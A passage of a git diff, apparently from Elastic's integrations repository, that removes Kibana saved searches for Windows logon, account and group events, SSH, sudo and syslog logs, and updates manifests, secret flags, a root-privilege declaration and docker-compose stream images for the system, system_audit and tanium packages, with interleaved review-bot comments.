@@ -1,101 +0,0 @@ -{ - "attributes": { - "columns": [ - "user.name", - "user.domain", - "winlog.logon.id", - "event.action", - "winlog.logon.type", - "winlog.event_data.SubjectUserName" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "event.code", - "negate": false, - "params": { - "query": "4625" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.code": "4625" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", - "key": "winlog.provider_name", - "negate": false, - "params": { - "query": "Microsoft-Windows-Security-Auditing" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "winlog.provider_name": "Microsoft-Windows-Security-Auditing" - } - } - } - ], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "data_stream.dataset:windows.security OR data_stream.dataset:system.security" - }, - "version": true - } - }, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "User Logouts [Windows System Security]", - "version": 1 - }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-05-04T21:59:59.346Z", - "id": "system-06b6b060-7a80-11ea-bc9a-0baf2ca323a3", - "migrationVersion": { - "search": "8.0.0" - }, - "references": [ - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", - "type": 
"index-pattern" - } - ], - "type": "search" -} \ No newline at end of file diff --git a/packages/system/kibana/search/system-324686c0-fefb-11e9-8405-516218e3d268.json b/packages/system/kibana/search/system-324686c0-fefb-11e9-8405-516218e3d268.json deleted file mode 100644 index 2927c111bf7..00000000000 --- a/packages/system/kibana/search/system-324686c0-fefb-11e9-8405-516218e3d268.json +++ /dev/null 
@@ -1,144 +0,0 @@ -{ - "attributes": { - "columns": [ - "event.action", - "winlog.event_data.TargetUserName", - "user.domain", - "user.name", - "winlog.event_data.SubjectDomainName", - "winlog.logon.id", - "related.user" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "event.code", - "negate": false, - "params": [ - "4720", - "4722", - "4723", - "4724", - "4725", - "4726", - "4738", - "4740", - "4767", - "4781", - "4798" - ], - "type": "phrases", - "value": "4720, 4722, 4723, 4724, 4725, 4726, 4738, 4740, 4767, 4781, 4798" - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "event.code": "4720" - } - }, - { - "match_phrase": { - "event.code": "4722" - } - }, - { - "match_phrase": { - "event.code": "4723" - } - }, - { - "match_phrase": { - "event.code": "4724" - } - }, - { - "match_phrase": { - "event.code": "4725" - } - }, - { - "match_phrase": { - "event.code": "4726" - } - }, - { - "match_phrase": { - "event.code": "4738" - } - }, - { - "match_phrase": { - "event.code": "4740" - } - }, - { - "match_phrase": { - "event.code": "4767" - } - }, - { - "match_phrase": { - "event.code": "4781" - } - }, - { - "match_phrase": { - "event.code": "4798" - } - } - ] - } - } - } - ], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "data_stream.dataset:windows.security OR data_stream.dataset:system.security" - }, - "version": true - } - }, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "User management Details - Search [Windows System Security]", - "version": 1 - }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-05-04T21:59:59.346Z", - "id": 
"system-324686c0-fefb-11e9-8405-516218e3d268", - "migrationVersion": { - "search": "8.0.0" - }, - "references": [ - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" - } - ], - "type": "search" -} \ No newline at end of file diff --git a/packages/system/kibana/search/system-62439dc0-f9c9-11e6-a747-6121780e0414.json b/packages/system/kibana/search/system-62439dc0-f9c9-11e6-a747-6121780e0414.json deleted file mode 100644 index beb8bef8ff9..00000000000 --- a/packages/system/kibana/search/system-62439dc0-f9c9-11e6-a747-6121780e0414.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "attributes": { - "columns": [ - "system.auth.ssh.event", - "system.auth.ssh.method", - "user.name", - "source.ip", - "source.geo.country_iso_code" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "data_stream.dataset:system.auth AND system.auth.ssh.event:*" - } - } - }, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "SSH login attempts [Logs System]", - "version": 1 - }, - "coreMigrationVersion": "8.6.1", - "created_at": "2023-03-23T04:03:56.987Z", - "id": "system-62439dc0-f9c9-11e6-a747-6121780e0414", - "migrationVersion": { - "search": "8.0.0" - }, - "references": [ - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - } - ], - "type": "search" -} \ No newline at end of file diff --git a/packages/system/kibana/search/system-6f4071a0-7a78-11ea-bc9a-0baf2ca323a3.json b/packages/system/kibana/search/system-6f4071a0-7a78-11ea-bc9a-0baf2ca323a3.json deleted file mode 100644 index a4db9fdd6cd..00000000000 
--- a/packages/system/kibana/search/system-6f4071a0-7a78-11ea-bc9a-0baf2ca323a3.json +++ /dev/null @@ -1,88 +0,0 @@ -{ - "attributes": { - "columns": [ - "user.name", - "source.domain", - "source.ip", - "winlog.logon.id", - "event.action" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "event.code", - "negate": false, - "params": [ - "4778", - "4779" - ], - "type": "phrases", - "value": "4778, 4779" - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "event.code": "4778" - } - }, - { - "match_phrase": { - "event.code": "4779" - } - } - ] - } - } - } - ], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "data_stream.dataset:windows.security OR data_stream.dataset:system.security" - }, - "version": true - } - }, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "Remote Interactive Connections and Disconnections [Windows System Security]", - "version": 1 - }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-05-04T21:59:59.346Z", - "id": "system-6f4071a0-7a78-11ea-bc9a-0baf2ca323a3", - "migrationVersion": { - "search": "8.0.0" - }, - "references": [ - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" - } - ], - "type": "search" -} \ No newline at end of file diff --git a/packages/system/kibana/search/system-757510b0-a87f-11e9-a422-d144027429da.json b/packages/system/kibana/search/system-757510b0-a87f-11e9-a422-d144027429da.json deleted file mode 100644 index e1efc40d0a7..00000000000 
--- a/packages/system/kibana/search/system-757510b0-a87f-11e9-a422-d144027429da.json +++ /dev/null 
@@ -1,116 +0,0 @@ -{ - "attributes": { - "columns": [ - "event.action", - "user.name", - "related.user", - "user.domain", - "source.domain", - "source.ip", - "winlog.event_data.SubjectUserName" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "event.code", - "negate": false, - "params": [ - "4625", - "4740" - ], - "type": "phrases", - "value": "4625, 4740" - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "event.code": "4625" - } - }, - { - "match_phrase": { - "event.code": "4740" - } - } - ] - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", - "key": "winlog.provider_name", - "negate": false, - "params": { - "query": "Microsoft-Windows-Security-Auditing" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "winlog.provider_name": "Microsoft-Windows-Security-Auditing" - } - } - } - ], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "data_stream.dataset:windows.security OR data_stream.dataset:system.security" - }, - "version": true - } - }, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "3. 
Login Failed Details", - "version": 1 - }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-05-04T21:59:59.346Z", - "id": "system-757510b0-a87f-11e9-a422-d144027429da", - "migrationVersion": { - "search": "8.0.0" - }, - "references": [ - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", - "type": "index-pattern" - } - ], - "type": "search" -} \ No newline at end of file diff --git a/packages/system/kibana/search/system-7e178c80-fee1-11e9-8405-516218e3d268.json b/packages/system/kibana/search/system-7e178c80-fee1-11e9-8405-516218e3d268.json deleted file mode 100644 index 728ec1dc1b5..00000000000 --- a/packages/system/kibana/search/system-7e178c80-fee1-11e9-8405-516218e3d268.json +++ /dev/null 
@@ -1,82 +0,0 @@ -{ - "attributes": { - "columns": [ - "user.name", - "source.domain", - "source.ip", - "winlog.logon.id", - "winlog.logon.type" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "event.code", - "negate": false, - "params": [ - "4624" - ], - "type": "phrases", - "value": "4624" - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "event.code": "4624" - } - } - ] - } - } - } - ], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "data_stream.dataset:windows.security OR data_stream.dataset:system.security" - }, - "version": true - } - }, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "Logon Details [Windows System Security]", - "version": 1 - }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-05-04T21:59:59.346Z", - "id": "system-7e178c80-fee1-11e9-8405-516218e3d268", - "migrationVersion": { - "search": "8.0.0" - }, - "references": [ - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" - } - ], - "type": "search" -} \ No newline at end of file diff --git a/packages/system/kibana/search/system-8030c1b0-fa77-11e6-ae9b-81e5311e8cab.json b/packages/system/kibana/search/system-8030c1b0-fa77-11e6-ae9b-81e5311e8cab.json deleted file mode 100644 index 33976f6cceb..00000000000 --- a/packages/system/kibana/search/system-8030c1b0-fa77-11e6-ae9b-81e5311e8cab.json +++ /dev/null 
@@ -1,46 +0,0 @@ -{ - "attributes": { - "columns": [ - "user.name", - "user.id", - "group.id", - "system.auth.useradd.home", - "system.auth.useradd.shell" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "system.auth.useradd:*" - } - } - }, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "useradd logs [Logs System]", - "version": 1 - }, - "coreMigrationVersion": "8.6.1", - "created_at": "2023-03-23T04:03:56.987Z", - "id": "system-8030c1b0-fa77-11e6-ae9b-81e5311e8cab", - "migrationVersion": { - "search": "8.0.0" - }, - "references": [ - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - } - ], - "type": "search" -} \ No newline at end of file diff --git a/packages/system/kibana/search/system-9066d5b0-fef2-11e9-8405-516218e3d268.json b/packages/system/kibana/search/system-9066d5b0-fef2-11e9-8405-516218e3d268.json deleted file mode 100644 index 85ebf374603..00000000000 --- a/packages/system/kibana/search/system-9066d5b0-fef2-11e9-8405-516218e3d268.json +++ /dev/null 
@@ -1,263 +0,0 @@ -{ - "attributes": { - "columns": [ - "event.action", - "group.name", - "group.domain", - "user.name", - "user.domain", - "host.name" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "event.code", - "negate": false, - "params": [ - "4731", - "4732", - "4733", - "4734", - "4735", - "4737", - "4764", - "4727", - "4728", - "4729", - "4730", - "4754", - "4755", - "4756", - "4757", - "4758", - "4799", - "4749", - "4750", - "4751", - "4752", - "4753", - "4759", - "4760", - "4761", - "4762", - "4763", - "4744", - "4745", - "4746", - "4748" - ], - "type": "phrases", - "value": "4731, 4732, 4733, 4734, 4735, 4737, 4764, 4727, 4728, 4729, 4730, 4754, 4755, 4756, 4757, 4758, 4799, 4749, 4750, 4751, 4752, 4753, 4759, 4760, 4761, 4762, 4763, 4744, 4745, 4746, 4748" - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "event.code": "4731" - } - }, - { - "match_phrase": { - "event.code": "4732" - } - }, - { - "match_phrase": { - "event.code": "4733" - } - }, - { - "match_phrase": { - "event.code": "4734" - } - }, - { - "match_phrase": { - "event.code": "4735" - } - }, - { - "match_phrase": { - "event.code": "4737" - } - }, - { - "match_phrase": { - "event.code": "4764" - } - }, - { - "match_phrase": { - "event.code": "4727" - } - }, - { - "match_phrase": { - "event.code": "4728" - } - }, - { - "match_phrase": { - "event.code": "4729" - } - }, - { - "match_phrase": { - "event.code": "4730" - } - }, - { - "match_phrase": { - "event.code": "4754" - } - }, - { - "match_phrase": { - "event.code": "4755" - } - }, - { - "match_phrase": { - "event.code": "4756" - } - }, - { - "match_phrase": { - "event.code": "4757" - } - }, - { - "match_phrase": { - "event.code": "4758" - } - }, - { - 
"match_phrase": { - "event.code": "4799" - } - }, - { - "match_phrase": { - "event.code": "4749" - } - }, - { - "match_phrase": { - "event.code": "4750" - } - }, - { - "match_phrase": { - "event.code": "4751" - } - }, - { - "match_phrase": { - "event.code": "4752" - } - }, - { - "match_phrase": { - "event.code": "4753" - } - }, - { - "match_phrase": { - "event.code": "4759" - } - }, - { - "match_phrase": { - "event.code": "4760" - } - }, - { - "match_phrase": { - "event.code": "4761" - } - }, - { - "match_phrase": { - "event.code": "4762" - } - }, - { - "match_phrase": { - "event.code": "4763" - } - }, - { - "match_phrase": { - "event.code": "4744" - } - }, - { - "match_phrase": { - "event.code": "4745" - } - }, - { - "match_phrase": { - "event.code": "4746" - } - }, - { - "match_phrase": { - "event.code": "4748" - } - } - ] - } - } - } - ], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "data_stream.dataset:windows.security OR data_stream.dataset:system.security" - }, - "version": true - } - }, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "Group Management Details - Search View [Windows System Security]", - "version": 1 - }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-05-04T21:59:59.346Z", - "id": "system-9066d5b0-fef2-11e9-8405-516218e3d268", - "migrationVersion": { - "search": "8.0.0" - }, - "references": [ - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" - } - ], - "type": "search" -} \ No newline at end of file diff --git a/packages/system/kibana/search/system-Syslog-system-logs.json b/packages/system/kibana/search/system-Syslog-system-logs.json deleted file mode 100644 index 972a1c3664d..00000000000 
--- a/packages/system/kibana/search/system-Syslog-system-logs.json +++ /dev/null @@ -1,57 +0,0 @@ -{ - "attributes": { - "columns": [ - "host.hostname", - "process.name", - "message" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "highlight": { - "fields": { - "*": {} - }, - "fragment_size": 2147483647, - "post_tags": [ - "@/kibana-highlighted-field@" - ], - "pre_tags": [ - "@kibana-highlighted-field@" - ], - "require_field_match": false - }, - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "data_stream.dataset:system.syslog" - } - } - }, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "Syslog logs [Logs System]", - "version": 1 - }, - "coreMigrationVersion": "8.6.1", - "created_at": "2023-03-23T04:03:56.987Z", - "id": "system-Syslog-system-logs", - "migrationVersion": { - "search": "8.0.0" - }, - "references": [ - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - } - ], - "type": "search" -} \ No newline at end of file diff --git a/packages/system/kibana/search/system-b6f321e0-fa25-11e6-bbd3-29c986c96e5a.json b/packages/system/kibana/search/system-b6f321e0-fa25-11e6-bbd3-29c986c96e5a.json deleted file mode 100644 index 1d3b43970c0..00000000000 --- a/packages/system/kibana/search/system-b6f321e0-fa25-11e6-bbd3-29c986c96e5a.json +++ /dev/null 
@@ -1,45 +0,0 @@ -{ - "attributes": { - "columns": [ - "user.name", - "system.auth.sudo.user", - "system.auth.sudo.pwd", - "system.auth.sudo.command" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "system.auth.sudo:*" - } - } - }, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "Sudo commands [Logs System]", - "version": 1 - }, - "coreMigrationVersion": "8.6.1", - "created_at": "2023-03-23T04:03:56.987Z", - "id": "system-b6f321e0-fa25-11e6-bbd3-29c986c96e5a", - "migrationVersion": { - "search": "8.0.0" - }, - "references": [ - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - } - ], - "type": "search" -} \ No newline at end of file diff --git a/packages/system/manifest.yml b/packages/system/manifest.yml index 8d5f34ba6e2..5f4876eb806 100644 --- a/packages/system/manifest.yml +++ b/packages/system/manifest.yml @@ -1,14 +1,14 @@ -format_version: 3.0.0 +format_version: 3.0.2 name: system title: System -version: 1.53.0 +version: 1.54.0 description: Collect system logs and metrics from your servers with Elastic Agent. type: integration categories: - os_system conditions: kibana: - version: '^8.11.0' + version: '^8.12.0' screenshots: - src: /img/system-overview.png title: system overview @@ -71,11 +71,13 @@ policy_templates: - name: password type: password title: Splunk REST API Password + secret: true show_user: true required: false - name: token type: password title: Splunk Authorization Token + secret: true description: | Bearer Token or Session Key, e.g. "Bearer eyJFd3e46..." or "Splunk 192fd3e...". Cannot be used with username diff --git a/packages/system_audit/changelog.yml b/packages/system_audit/changelog.yml index 81b39c27934..4df5925955c 100644 --- a/packages/system_audit/changelog.yml 
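Review bot: The `conditions.kibana.version` floor in the first system manifest hunk moves from `^8.11.0` to `^8.12.0`, a user-visible install requirement that follows from the `secret: true` flags added in the second hunk, yet no changelog entry in this diff mentions it. The same bump appears for tanium (`^8.3.0` to `^8.12.0`), tenable_io and tenable_sc (both `^8.7.1` to `^8.12.0`), whose visible changelog entries only say "Set sensitive values as secret" or "Update manifest format version"; the system changelog itself is not in this diff, so I can only infer it is missing there too. A description such as `Mark password and token variables as secret; requires Kibana 8.12.0 or later.` would tell operators why an upgrade is blocked on older stacks.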
+++ b/packages/system_audit/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.10.2"
+ changes:
+ - description: capture root requirement
+ type: enhancement
+ link: https://github.com/elastic/integrations/issues/8647
 - version: "1.10.1"
 changes:
 - description: Changed owners
diff --git a/packages/system_audit/manifest.yml b/packages/system_audit/manifest.yml
index 67216ddb2ff..ca803fc372e 100644
--- a/packages/system_audit/manifest.yml
+++ b/packages/system_audit/manifest.yml
@@ -3,7 +3,7 @@ name: system_audit
 title: System Audit
 description: Collect various logs & metrics from System Audit modules with Elastic Agent.
 type: integration
-version: "1.10.1"
+version: "1.10.2"
 conditions:
 kibana:
 version: '^8.7.1'
@@ -27,6 +27,9 @@ policy_templates:
 - type: audit/system
 title: System Audit
 description: Collect various logs & metrics from System Audit modules with Elastic Agent.
+agent:
+ privileges:
+ root: true
 owner:
 github: elastic/sec-linux-platform
 type: elastic
diff --git a/packages/tanium/_dev/deploy/docker/docker-compose.yml b/packages/tanium/_dev/deploy/docker/docker-compose.yml
index 5aad61867ee..61cb12f1816 100644
--- a/packages/tanium/_dev/deploy/docker/docker-compose.yml
+++ b/packages/tanium/_dev/deploy/docker/docker-compose.yml
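Review bot: The new `agent.privileges.root: true` block in the manifest hunk declares that the whole package needs root on the host, but neither the manifest nor the changelog entry ("capture root requirement") records which input needs it or why, so a later reviewer cannot judge whether the privilege could be narrowed. The only input in this package is `audit/system`, so the requirement presumably comes from it; a one-line comment above the block, e.g. `# audit/system datasets need root on the host — see <link to reason>`, would preserve that justification next to the declaration. The changelog entry also links an issue rather than the PR that made the change, unlike the neighbouring entries.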
@@ -1,43 +1,37 @@ version: '2.3' services: tanium-tcp-action_history: - image: docker.elastic.co/observability/stream:v0.9.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9082 -p=tcp /sample_logs/action_history.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9082 -p=tcp /sample_logs/action_history.log tanium-tcp-client_status: - image: docker.elastic.co/observability/stream:v0.9.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9083 -p=tcp /sample_logs/client_status.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9083 -p=tcp /sample_logs/client_status.log tanium-tcp-discover: - image: docker.elastic.co/observability/stream:v0.9.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9084 -p=tcp /sample_logs/discover.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9084 -p=tcp /sample_logs/discover.log tanium-tcp-endpoint_config: - image: docker.elastic.co/observability/stream:v0.9.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9085 -p=tcp /sample_logs/endpoint_config.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9085 -p=tcp /sample_logs/endpoint_config.log tanium-tcp-reporting: - image: docker.elastic.co/observability/stream:v0.9.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - 
command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9086 -p=tcp /sample_logs/reporting.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9086 -p=tcp /sample_logs/reporting.log tanium-tcp-threat_response: - image: docker.elastic.co/observability/stream:v0.9.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9087 -p=tcp /sample_logs/threat_response.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9087 -p=tcp /sample_logs/threat_response.log tanium-action_history-http-endpoint: - image: docker.elastic.co/observability/stream:v0.9.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro environment: @@ -45,7 +39,7 @@ services: - STREAM_ADDR=http://elastic-agent:9087/ command: log --start-signal=SIGHUP --delay=5s /sample_logs/action_history.log tanium-client_status-http-endpoint: - image: docker.elastic.co/observability/stream:v0.9.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro environment: @@ -53,7 +47,7 @@ services: - STREAM_ADDR=http://elastic-agent:9088/ command: log --start-signal=SIGHUP --delay=5s /sample_logs/client_status.log tanium-discover-http-endpoint: - image: docker.elastic.co/observability/stream:v0.9.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro environment: @@ -61,7 +55,7 @@ services: - STREAM_ADDR=http://elastic-agent:9089/ command: log --start-signal=SIGHUP --delay=5s /sample_logs/discover.log tanium-endpoint_config-http-endpoint: - image: docker.elastic.co/observability/stream:v0.9.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro environment: 
@@ -69,7 +63,7 @@ services:
 - STREAM_ADDR=http://elastic-agent:9090/
 command: log --start-signal=SIGHUP --delay=5s /sample_logs/endpoint_config.log
 tanium-reporting-http-endpoint:
- image: docker.elastic.co/observability/stream:v0.9.0
+ image: docker.elastic.co/observability/stream:v0.15.0
 volumes:
 - ./sample_logs:/sample_logs:ro
 environment:
@@ -77,7 +71,7 @@ services:
 - STREAM_ADDR=http://elastic-agent:9091/
 command: log --start-signal=SIGHUP --delay=5s /sample_logs/reporting.log
 tanium-threat_response-http-endpoint:
- image: docker.elastic.co/observability/stream:v0.9.0
+ image: docker.elastic.co/observability/stream:v0.15.0
 volumes:
 - ./sample_logs:/sample_logs:ro
 environment:
diff --git a/packages/tanium/changelog.yml b/packages/tanium/changelog.yml
index 639f58bca3f..ae31cdc428f 100644
--- a/packages/tanium/changelog.yml
+++ b/packages/tanium/changelog.yml
@@ -1,4 +1,14 @@
 # newer versions go on top
+- version: "1.9.0"
+ changes:
+ - description: Update manifest format version to v3.0.3.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9519
+- version: "1.8.0"
+ changes:
+ - description: Set sensitive values as secret.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9128
 - version: "1.7.1"
 changes:
 - description: Changed owners
diff --git a/packages/tanium/data_stream/threat_response/_dev/test/pipeline/test-common-config.yml b/packages/tanium/data_stream/threat_response/_dev/test/pipeline/test-common-config.yml
index be41bb0d476..f6701e34caf 100644
--- a/packages/tanium/data_stream/threat_response/_dev/test/pipeline/test-common-config.yml
+++ b/packages/tanium/data_stream/threat_response/_dev/test/pipeline/test-common-config.yml
@@ -2,3 +2,5 @@ fields:
 tags:
 - preserve_original_event
 - preserve_duplicate_custom_fields
+numeric_keyword_fields:
+ - tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.intel_intra_ids.id
\ No newline at end of file
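Review bot: The added `numeric_keyword_fields` list in test-common-config.yml ends with `\ No newline at end of file`, and the same is true of the two system test configs that follow (test-http-endpoint-config.yml and test-tcp-config.yml). A trailing newline keeps these files well-formed text files and avoids a spurious change to the last line the next time someone appends to the list.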
diff --git a/packages/tanium/data_stream/threat_response/_dev/test/system/test-http-endpoint-config.yml b/packages/tanium/data_stream/threat_response/_dev/test/system/test-http-endpoint-config.yml index b2469e2b460..825750431d4 100644 --- a/packages/tanium/data_stream/threat_response/_dev/test/system/test-http-endpoint-config.yml +++ b/packages/tanium/data_stream/threat_response/_dev/test/system/test-http-endpoint-config.yml @@ -8,3 +8,5 @@ data_stream: listen_port: 9092 preserve_original_event: true preserve_duplicate_custom_fields: true +numeric_keyword_fields: + - tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.intel_intra_ids.id \ No newline at end of file diff --git a/packages/tanium/data_stream/threat_response/_dev/test/system/test-tcp-config.yml b/packages/tanium/data_stream/threat_response/_dev/test/system/test-tcp-config.yml index 34f69bc3698..525439ef37a 100644 --- a/packages/tanium/data_stream/threat_response/_dev/test/system/test-tcp-config.yml +++ b/packages/tanium/data_stream/threat_response/_dev/test/system/test-tcp-config.yml @@ -8,3 +8,5 @@ data_stream: listen_port: 9087 preserve_original_event: true preserve_duplicate_custom_fields: true +numeric_keyword_fields: + - tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.intel_intra_ids.id \ No newline at end of file diff --git a/packages/tanium/data_stream/threat_response/fields/fields.yml b/packages/tanium/data_stream/threat_response/fields/fields.yml index 67dfa7145e1..a505796e75e 100644 --- 